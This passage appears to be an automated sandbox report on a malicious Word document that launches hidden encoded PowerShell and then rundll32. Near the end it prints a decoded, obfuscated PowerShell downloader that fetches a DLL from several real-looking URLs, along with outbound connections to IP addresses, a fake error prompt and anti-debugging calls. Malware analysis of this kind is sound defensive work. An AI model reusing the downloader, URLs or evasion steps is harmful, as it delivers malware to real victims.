                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3647
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5292
                Source: C:\Windows\SysWOW64\rundll32.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                Source: C:\Windows\SysWOW64\rundll32.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3976 | Thread sleep count: 3647 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3684 | Thread sleep count: 5292 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6700 | Thread sleep time: -7378697629483816s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 6200 | Thread sleep time: -210000s >= -30000s
                Source: C:\Windows\SysWOW64\rundll32.exe | File Volume queried: C:\ FullSizeInformation
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F4A461 FindFirstFileW,
                Source: svchost.exe, 0000000F.00000002.762491532.0000027963AFC000.00000004.00000001.sdmp | Binary or memory string: $@Hyper-V RAW
                Source: powershell.exe, 00000004.00000002.701205155.000002712BCA0000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.710854626.0000021703940000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.728166492.00000202A9140000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.763462020.0000027964A00000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                Source: powershell.exe, 00000004.00000002.701036480.000002712B822000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAWB7%SystemRoot%\system32\mswsock.dllBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwBy
                Source: svchost.exe, 0000000F.00000002.762477860.0000027963AED000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
                Source: powershell.exe, 00000004.00000002.701205155.000002712BCA0000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.710854626.0000021703940000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.728166492.00000202A9140000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.763462020.0000027964A00000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                Source: powershell.exe, 00000004.00000002.701205155.000002712BCA0000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.710854626.0000021703940000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.728166492.00000202A9140000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.763462020.0000027964A00000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                Source: svchost.exe, 0000000F.00000002.762378344.0000027963A82000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW@
                Source: powershell.exe, 00000004.00000002.701205155.000002712BCA0000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.710854626.0000021703940000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.728166492.00000202A9140000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.763462020.0000027964A00000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                Source: C:\Windows\SysWOW64\rundll32.exe | API call chain: ExitProcess graph end node
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10002460 RunDLL,LoadLibraryA,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,Show
Window,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWind
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_10007528 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_10013BFB LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00F4166C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_10004500 GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_10007528 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_10009F26 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_10006F64 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                HIPS / PFW / Operating System Protection Evasion:

                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 97.120.3.198 80
                Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 70.180.33.202 80
                Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 50.116.111.59 144
                Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 173.249.20.233 187
                Encrypted powershell cmdline option found
                Source: unknownProcess created: Base64 decoded $CrA = [TyPE]("{3}{1}{0}{2}" -F 'em.IO.','St','direCtOry','sY') ; SV ("5hv"+"1z") ([TyPE]("{1}{2}{4}{3}{0}"-f'nAGeR','sYstE','M.Net.SeRVic','A','epOiNTm') ) ; $Avnn0uf=(('Ty7n'+'0')+'sc');$H2q6qpz=$Umcrug1 + [char](64) + $Yvk6hcp;$N667cll=('P'+('4m'+'s')+('v'+'rs')); ( GeT-VaRIaBLE ("C"+"ra") ).VaLUE::"cR`e`AtedIr`Ectory"($HOME + (('{0}F'+('2n'+'efq')+'6{0}P'+('rs'+'2nd')+'h{0}')-F [CHaR]92));$K00aa2c=('Wh'+('p'+'oj')+'lo'); ( geT-VAriABle ("5HV"+"1z") ).VaLUE::"sEcURItypR`OToC`OL" = ('T'+('l'+'s12'));$Fz5dygs=('B'+('p'+'825i'+'v'));$Q4a8l15 = (('Ch'+'pie'+'o')+'g');$Uab688o=('K'+'y'+('j8x'+'oq'));$Lr0w5la=('P'+('9'+'lc7f')+'u');$Zrwjh9k=$HOME+(('{0'+'}F2n'+'ef'+'q6{0}Prs2'+'ndh{0}')-f[CHaR]92)+$Q4a8l15+('.d'+'ll');$Nbmxfxv=(('Aw'+'n')+('g'+'0z6'));$V0_ri0n=New`-oB`jEcT neT.webCLIeNt;$Nkq_g0q=(('h'+(('ttp:'+'J)(3s'))+(('2'+')('))+(('J'+')(3s2'+')(arq'))+'ui'+('v'+'opop.c')+('o'+'m'+'.brJ')+((')'+'(3s'))+(('2)'))+(('(i'))+'n'+('dex_htm_'+'f'+'il'+'esJ')+((')'+'(3'))+(('s'+'2)'))+(('(Kx'+'hJ'))+((')('+'3'))+(('s2)(@ht'+'t'+'p'))+(('s:J'+')(3s2'))+((')(J'+')'))+'('+'3s'+(('2)'))+(('(cairoc'+'a'+'d'))+'.c'+(('om'+'J)('+'3'))+(('s'+'2)(c'))+('gi'+'-'+'binJ')+((')(3s2)('+'1P'+'B'+'B'))+(('J)(3s2)'+'('))+'@'+('h'+'tt')+'p'+'s'+((':J)(3s2'+')(J'+')(3'))+'s'+(('2)('+'w'))+('ww.'+'i'+'satechno')+'l'+('o'+'gy.')+(('comJ'+')(3s'+'2)'+'(t'+'raining'+'J)('+'3'))+'s2'+((')'+'(bJ'+')('))+(('3s2'+')'))+(('(@ht'+'t'))+'p'+':'+(('J)'))+'('+'3'+(('s2'+')('))+(('J)'))+(('(3s'+'2')
                Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $CrA = [TyPE]("{3}{1}{0}{2}" -F 'em.IO.','St','direCtOry','sY') ; SV ("5hv"+"1z") ([TyPE]("{1}{2}{4}{3}{0}"-f'nAGeR','sYstE','M.Net.SeRVic','A','epOiNTm') ) ; $Avnn0uf=(('Ty7n'+'0')+'sc');$H2q6qpz=$Umcrug1 + [char](64) + $Yvk6hcp;$N667cll=('P'+('4m'+'s')+('v'+'rs')); ( GeT-VaRIaBLE ("C"+"ra") ).VaLUE::"cR`e`AtedIr`Ectory"($HOME + (('{0}F'+('2n'+'efq')+'6{0}P'+('rs'+'2nd')+'h{0}')-F [CHaR]92));$K00aa2c=('Wh'+('p'+'oj')+'lo'); ( geT-VAriABle ("5HV"+"1z") ).VaLUE::"sEcURItypR`OToC`OL" = ('T'+('l'+'s12'));$Fz5dygs=('B'+('p'+'825i'+'v'));$Q4a8l15 = (('Ch'+'pie'+'o')+'g');$Uab688o=('K'+'y'+('j8x'+'oq'));$Lr0w5la=('P'+('9'+'lc7f')+'u');$Zrwjh9k=$HOME+(('{0'+'}F2n'+'ef'+'q6{0}Prs2'+'ndh{0}')-f[CHaR]92)+$Q4a8l15+('.d'+'ll');$Nbmxfxv=(('Aw'+'n')+('g'+'0z6'));$V0_ri0n=New`-oB`jEcT neT.webCLIeNt;$Nkq_g0q=(('h'+(('ttp:'+'J)(3s'))+(('2'+')('))+(('J'+')(3s2'+')(arq'))+'ui'+('v'+'opop.c')+('o'+'m'+'.brJ')+((')'+'(3s'))+(('2)'))+(('(i'))+'n'+('dex_htm_'+'f'+'il'+'esJ')+((')'+'(3'))+(('s'+'2)'))+(('(Kx'+'hJ'))+((')('+'3'))+(('s2)(@ht'+'t'+'p'))+(('s:J'+')(3s2'))+((')(J'+')'))+'('+'3s'+(('2)'))+(('(cairoc'+'a'+'d'))+'.c'+(('om'+'J)('+'3'))+(('s'+'2)(c'))+('gi'+'-'+'binJ')+((')(3s2)('+'1P'+'B'+'B'))+(('J)(3s2)'+'('))+'@'+('h'+'tt')+'p'+'s'+((':J)(3s2'+')(J'+')(3'))+'s'+(('2)('+'w'))+('ww.'+'i'+'satechno')+'l'+('o'+'gy.')+(('comJ'+')(3s'+'2)'+'(t'+'raining'+'J)('+'3'))+'s2'+((')'+'(bJ'+')('))+(('3s2'+')'))+(('(@ht'+'t'))+'p'+':'+(('J)'))+'('+'3'+(('s2'+')('))+(('J)'))+(('(3s'+'2')
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
